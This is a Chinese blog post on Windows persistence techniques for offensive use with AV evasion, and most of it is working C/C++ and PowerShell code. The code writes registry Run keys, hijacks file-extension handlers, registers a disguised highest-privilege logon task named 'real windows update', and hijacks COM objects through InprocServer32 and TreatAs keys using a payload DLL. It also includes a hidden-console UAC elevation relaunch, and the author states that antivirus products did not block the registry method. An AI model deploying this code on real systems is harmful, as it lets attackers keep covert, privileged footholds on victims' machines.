-
浅谈免杀下的持久化
前记
实战中持久化的手段常用的就是加服务、添改注册表、加计划任务、劫持等,这里探索c/c++下的维权免杀
注册表
用户级
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce- 1
- 2
系统级(需要管理员权限)
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce- 1
- 2
- 3
- 4
详细代码
#include#include int main(void) { HKEY hKey; DWORD result; //打开注册表 DWORD lRet = RegOpenKeyExA( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey ); if (lRet != ERROR_SUCCESS) return 0; char szModule[MAX_PATH]; GetModuleFileNameA(NULL, szModule, MAX_PATH); lRet = RegSetValueExA( hKey, "coleak", 0, REG_SZ, (BYTE*)szModule, strlen(szModule) ); if (lRet == ERROR_SUCCESS) printf("success\n"); else { printf("failed"); } RegCloseKey(hKey); return 0; } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
如果拿到了管理员权限,还可以通过后缀劫持进行维权
#include#include void showErrorText(DWORD error_num); int main() { HKEY hKey; DWORD result; char szModule[MAX_PATH]; GetModuleFileNameA(NULL, szModule, MAX_PATH);// 要替换的程序, 没写 %1 即调用时不会把双击的文件路径传给exe //打开注册表 result = RegOpenKeyExA( HKEY_CLASSES_ROOT, "xxx\\shell\\Open\\command", // 要打开的注册表项名称 0, // 保留参数必须填 0 KEY_SET_VALUE, // 打开权限,写入 &hKey // 打开之后的句柄 ); if (result == ERROR_SUCCESS) { printf("open success!n"); } else { printf("open failed!n"); showErrorText(result); system("pause"); return 0; } // 设置注册表的值 result = RegSetValueExA( hKey, "", // 设置默认值 0, // 保留参数必须填 0 REG_SZ, // 键值类型为字符串 (const unsigned char*)szModule, // 字符串首地址 sizeof(szModule) // 字符串长度 ); if (result == ERROR_SUCCESS) { printf("set success!n"); } else { printf("set failed!n"); showErrorText(result); } //关闭注册表: RegCloseKey(hKey); // 暂停 system("pause"); return 0; } /* * 根据错误码输出错误信息 */ void showErrorText(DWORD error_num) { char* msg = NULL; FormatMessageA( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, error_num, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // 使用默认语言 (LPSTR)&msg, 0, NULL ); printf("Error code %d: ", error_num); if (msg == NULL) printf("%sn", "Unknown error"); else printf("%sn", msg); } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
这里测试火绒和微软的defender都是不拦截的
计划任务
- 触发器:定义了何时执行任务。可能是一次性的、按日程的、或者是响应特定事件的。
- 操作:定义了任务执行的具体操作。可能是启动应用程序、发送电子邮件、显示消息等。
- 条件:定义了任务执行的条件。例如,你可以配置任务仅在计算机空闲或只在特定的电源情况下执行。
- 设置:定义了任务的其他设置,例如任务失败时重试的次数,任务运行的最长时间等。
#include#include #include #include #include #include #pragma comment(lib, "taskschd.lib") ITaskService* m_lpITS = NULL; ITaskFolder* m_lpRootFolder = NULL; //初始化COM组件 void Init() { //1.CoInitialize初始化COM组件 HRESULT hr = CoInitialize(NULL); if (FAILED(hr)) { MessageBox(NULL, L"初始化COM组件失败", L"Failed", MB_OK); } //2.CoCreateInstance创建任务服务对象 hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (LPVOID*)&m_lpITS); if (FAILED(hr)) { MessageBox(NULL, L"创建任务服务失败", L"Failed", MB_OK); } //3.连接到任务服务 hr = m_lpITS->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); if (FAILED(hr)) { MessageBox(NULL, L"连接服务失败", L"Failed", MB_OK); } //4.从ITaskService对象中获取根任务Root Task Folder的指针对象ITaskFolder,这个指针指向新注册的任务 hr = m_lpITS->GetFolder(_bstr_t("\\"), &m_lpRootFolder); if (FAILED(hr)) { MessageBox(NULL, L"获取指针失败", L"Failed", MB_OK); } } //卸载COM组件 void UnInit() { if (m_lpITS) { m_lpITS->Release(); } if (m_lpRootFolder) { m_lpRootFolder->Release(); } CoUninitialize(); } //创建计划任务 BOOL CreateTask(const char* lpszTaskName, const char* lpszProgramPath, const char* lpszParameters, const char* lpszAuthor) { // 创建任务定义对象来创建任务 // If the same task exists, remove it. m_lpRootFolder->DeleteTask((BSTR)lpszTaskName,0); ITaskDefinition* pTaskDefinition = NULL; HRESULT hr = m_lpITS->NewTask(0, &pTaskDefinition); if (FAILED(hr)) { return FALSE; } /* 设置注册信息 */ IRegistrationInfo* pRegInfo = NULL; hr = pTaskDefinition->get_RegistrationInfo(&pRegInfo); if (FAILED(hr)) { return FALSE; } // 设置作者信息 hr = pRegInfo->put_Author(_bstr_t(lpszAuthor)); pRegInfo->Release(); /* 设置登录类型和运行权限 */ IPrincipal* pPrincipal = NULL; hr = pTaskDefinition->get_Principal(&pPrincipal); if (FAILED(hr)) { return FALSE; } // 设置登录类型 hr = pPrincipal->put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN); // 设置运行权限 // 最高权限 hr = pPrincipal->put_RunLevel(TASK_RUNLEVEL_HIGHEST); pPrincipal->Release(); /* 设置其他信息 */ ITaskSettings* pSettting = NULL; hr = pTaskDefinition->get_Settings(&pSettting); if (FAILED(hr)) { return FALSE; } // 设置其他信息 hr = pSettting->put_StopIfGoingOnBatteries(VARIANT_FALSE); hr = pSettting->put_DisallowStartIfOnBatteries(VARIANT_FALSE); hr = pSettting->put_AllowDemandStart(VARIANT_TRUE); hr = pSettting->put_StartWhenAvailable(VARIANT_FALSE); hr = pSettting->put_MultipleInstances(TASK_INSTANCES_PARALLEL); pSettting->Release(); /* 创建执行动作 */ IActionCollection* pActionCollect = NULL; hr = pTaskDefinition->get_Actions(&pActionCollect); if (FAILED(hr)) { return FALSE; } IAction* pAction = NULL; // 创建执行操作 hr = pActionCollect->Create(TASK_ACTION_EXEC, &pAction); pActionCollect->Release(); /* 设置执行程序路径和参数 */ CComVariant variantProgramPath(NULL); CComVariant variantParameters(NULL); IExecAction* pExecAction = NULL; hr = pAction->QueryInterface(IID_IExecAction, (PVOID*)(&pExecAction)); if (FAILED(hr)) { pAction->Release(); return FALSE; } pAction->Release(); // 设置程序路径和参数 variantProgramPath = lpszProgramPath; variantParameters = lpszParameters; pExecAction->put_Path(variantProgramPath.bstrVal); pExecAction->put_Arguments(variantParameters.bstrVal); pExecAction->Release(); /* 创建触发器,实现用户登陆自启动 */ ITriggerCollection* pTriggers = NULL; hr = pTaskDefinition->get_Triggers(&pTriggers); if (FAILED(hr)) { return FALSE; } // 创建触发器,把触发器设置为 ITrigger* pTrigger = NULL; hr = pTriggers->Create(TASK_TRIGGER_LOGON, &pTrigger); if (FAILED(hr)) { return FALSE; } /* 注册任务计划 */ IRegisteredTask* pRegisteredTask = NULL; CComVariant variantTaskName(NULL); variantTaskName = lpszTaskName; hr = m_lpRootFolder->RegisterTaskDefinition(variantTaskName.bstrVal, pTaskDefinition, TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(""), &pRegisteredTask); if (FAILED(hr)) { pTaskDefinition->Release(); return FALSE; } pTaskDefinition->Release(); pRegisteredTask->Release(); return TRUE; } //删除计划任务 BOOL DeleteTask(char* lpszTaskName) { if (NULL == m_lpRootFolder) { return FALSE; } CComVariant variantTaskName(NULL); variantTaskName = lpszTaskName; HRESULT hr = m_lpRootFolder->DeleteTask(variantTaskName.bstrVal, 0); if (FAILED(hr)) { return FALSE; } return TRUE; } int main() { const char* lpszTaskName = "real windows update"; //任务名 const char* lpszProgramPath = "c:\\windows\\system32\\calc.exe"; //要执行的程序路径 const char* lpszParameters = "whoami"; //程序参数 const char* lpszAuthor = "coleak"; Init(); BOOL bRet = CreateTask(lpszTaskName, lpszProgramPath, lpszParameters, lpszAuthor); if (!bRet) { printf("Create Task Failed"); return -1; } UnInit(); printf("Successd"); return 0; } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
如图计划任务以最高权限运行,但是程序本身需要管理员权限才能添加成功
COM劫持
常见的手段如下
- 修改已有的InprocServer32指向我们生成的dll
Import-Module .\Get-ScheduledTaskComHandler.ps1 Get-ScheduledTaskComHandler reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\InprocServer32" /d "C:\security\tmp\Dll.dll" /t REG_SZ /f- 1
- 2
- 3
- 4
- 设置计划任务通过 powershell 或 vbs 脚本来调用自己注册的恶意 COM
可以结合上面的写注册表和计划任务将vbs放到自启动去拉起com的函数
- 利用现有任务进行劫持
Action 为 Comhandler 的计划任务调用的全是系统内置 COM,他们在注册表中的修改权限都是 trustedinstaller,其他用户都只有读取权限。(需要3389修改拥有者)
- TreatAS键劫持
关键点是找到修改无需权限的节点,节点新建到HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID或者HKCU\Software\Classes\CLSID无需高权限
#定义 $HKLM = "HKLM:\software\classes\CLSID" $CLSID = "{C5602CE6-9B79-11D3-B654-581BBAEF8DBA}" $HijackCLSID = "{46C166AA-3108-11D4-9348-00C04F8EEB71}" $DLL = "C:\tmp\calculator_x64.dll" #新建恶意CLSID节点{C5602CE6-9B79-11D3-B654-581BBAEF8DBA} New-Item -Type Directory "$HKLM\$CLSID" #将键值指向恶意文件的路径并设置DLL线程模型 New-Item -ItemType String "$HKLM\$CLSID\InprocServer32" -value $DLL New-ItemProperty -Path "$HKLM\$CLSID\InprocServer32" -Name "ThreadingModel" -Value "Both" #在家庭网络配置管理器下CLSID节点新建TreatAs键并将默认值指向恶意CLSID节点 New-Item -ItemType String "$HKLM\$HijackCLSID\TreatAs" -value $CLSID #调用测试 rundll32.exe -sta $HijackCLSID #环境恢复,删除TreatAs键和恶意CLSID节点 Remove-Item -Path "$HKLM\$CLSID" -recurse Remove-Item -Path "$HKLM\$HijackCLSID\TreatAs" -recurse- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
测试
1、先尝试直接写注册表免注册com
# include# include #include using namespace std; int main(void) { HKEY hKey = NULL; char subKey[] = "SOFTWARE\\Classes\\CLSIDk\\{C5602CE6-9B79-12D3-B654-581BBAEF8DCD}"; DWORD dwOptions = REG_OPTION_NON_VOLATILE; DWORD dwDisposition; long resulte = RegCreateKeyExA(HKEY_CURRENT_USER, subKey, 0, NULL, dwOptions, KEY_WRITE, NULL, &hKey, &dwDisposition); char szModule[MAX_PATH]="C:\\security\\tmp\\ATLProject1.dll"; DWORD lRet = RegSetValueExA( hKey, "InprocServer32", 0, REG_SZ, (BYTE*)szModule, strlen(szModule) ); if (lRet == ERROR_SUCCESS) printf("success\n"); else { printf("failed"); } RegCloseKey(hKey); return 0; } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
调用的时候会报错如下:80040154 没有注册类(注册需要管理员权限),同时添加计划任务也需要管理员权限,非常不安全不建议这么搞
2、枚举可用于 COM 劫持的计划任务,然后在user注册表提前劫持或者通过TreatAS劫持
Import-Module .\Get-ScheduledTaskComHandler.ps1 Get-ScheduledTaskComHandler -PersistenceLocations- 1
- 2
测试的dll必须加互斥规则
BOOL TestMutex() { HANDLE hMutex = CreateMutex(NULL, false, "myself"); if (GetLastError() == ERROR_ALREADY_EXISTS) { CloseHandle(hMutex); return 0; } return 1; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: if(TestMutex()==0) return TRUE; WinExec("calc.exe",SW_SHOWNORMAL); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; }return TRUE; }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
后记
注册表功能
名称 作用 HKEY_CLASSES_ROOT 用于存储一些文档类型、类、类的关联属性。 HKEY_CURRENT_CONFIG 用户存储有关本地计算机系统的当前硬件配置文件信息。 HKEY_CURRENT_USER 用于存储当前用户配置项。 HKEY_LOCAL_MACHINE 用于存储当前用户物理状态。 HKEY_USERS 用于存储新用户的默认配置项。 CLSID
CLSID是微软提出的一个概念,中文翻译为:全局唯一标识符。CLSID是指Windows系统对于不同的应用程序,文件类型,OLE对象,特殊文件夹以及各种系统组件分配的一个唯一表示它的ID代码,用于对其身份的标识和与其他对象进行区分。
常见的CLSID:
{20D04FE0-3AEA-1069-A2D8-08002B30309D} 我的电脑 {450D8FBA-AD25-11D0-98A8-0800361B1103} 我的文档 {645FF040-5081-101B-9F08-00AA002F954E} 回收站- 1
- 2
- 3
CLSID结构体:
typedef struct _GUID { DWORD Data1; // 随机数 WORD Data2; // 和时间相关 WORD Data3; // 和时间相关 BYTE Data4[8]; // 和网卡MAC相关 } GUID; typedef GUID CLSID; // 组件ID typedef GUID IID; // 接口ID- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
注册表中的CLSID
CLSID Key:
Key Name 说明 LocalServer32 指定应用程序使用的自定义处理程序,即exe路径 InprocServer32/InprocHandler32 模块、线程属性配置,即dll路径 COM组件寻找顺序
- 1.HKCU\Software\Classes\CLSID
- 2.HKCR\CLSID;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
- 3.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\
理论上可行的3种劫持方案:
- HKCR中有,而HKCU中没有,只需要在HKCU中注册即可劫持HKCR中的COM服务。
- 修改掉
LocalServer32或InprocServer32的键值。 - 替换掉
LocalServer32或InprocServer32的键值中的文件。
注册调用编写的com
regsvr32.exe -i ATLProject1.dll #这是注册 regsvr32.exe /u ATLProject1.dll #这是卸载- 1
- 2
- vbs
set com=CreateObject("ATLProject1.temp") dim num num=com.Number(2) msgbox num- 1
- 2
- 3
- 4
- powershell
[activator]::CreateInstance([type]::GetTypeFromCLSID("1006b886-9932-45f8-ad39-bec8c210e15e")).Number(2)- 1
- cmd
rundll32.exe -sta {CLSID}- 1
请求管理员
VOID ManagerRun(LPCSTR exe, LPCSTR param) { SHELLEXECUTEINFOA ShExecInfo; ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; ShExecInfo.hwnd = NULL; ShExecInfo.lpVerb = "runas"; ShExecInfo.lpFile = exe; ShExecInfo.lpParameters = param; ShExecInfo.lpDirectory = NULL; ShExecInfo.nShow = SW_SHOW; ShExecInfo.hInstApp = NULL; BOOL ret = ShellExecuteExA(&ShExecInfo); //杀掉当前线程 CloseHandle(ShExecInfo.hProcess); return; } int main(int argc, char* argv[]) { if (argc == 1) //初次运行,即双击EXE { ShowWindow(GetConsoleWindow(), SW_HIDE); ManagerRun(argv[0], "2"); return 1; } else if (argc == 2) //再次运行,即上面那个ManagerRun { function(); /*你的程序主代码在此*/ } return 0; }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
reference
https://ruyueattention.github.io/2021/12/26/COM%E5%8A%AB%E6%8C%81/ https://bu1.github.io/2021/11/27/COM%E7%BB%84%E4%BB%B6%E5%8A%AB%E6%8C%81%E5%AD%A6%E4%B9%A0%EF%BC%9A%E4%BB%8E%E5%88%9D%E8%AF%86%E5%88%B0%E7%AE%80%E5%8D%95%E5%88%A9%E7%94%A8/ https://www.4hou.com/posts/Mo51 https://lellansin.wordpress.com/2014/07/28/%E6%9C%A8%E9%A9%AC%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81%EF%BC%88%E5%85%AB%EF%BC%89%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C/ https://github.com/enigma0x3/Misc-PowerShell-Stuff/ https://sp4zcmd.github.io/2021/02/28/%E4%BD%BF%E7%94%A8COM%E7%BB%84%E4%BB%B6%E5%88%9B%E5%BB%BA%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1/- 1
- 2
- 3
- 4
- 5
- 6
-
相关阅读:
mysql连接查询
python中第三方库Faker的使用
【FME实战教程】003:FME读取地理空间数据(矢量、栅格、点云、三维模型、数据库、地理服务)大全
C#/.NET/.NET Core优秀项目和框架2023年10月简报
关于生命周期的面试题vue
数字孪生电力系统,可视化应用实现科学调度的电子设备
CAD新手必练图形三
数据库与缓存的一致性
[LeetCode周赛复盘] 第 92 场双周赛20221015
机器学习——k-近邻算法、K-均值算法、PCA、异常检测算法、上限分析
- 原文地址:https://blog.csdn.net/qq_63701832/article/details/138169191
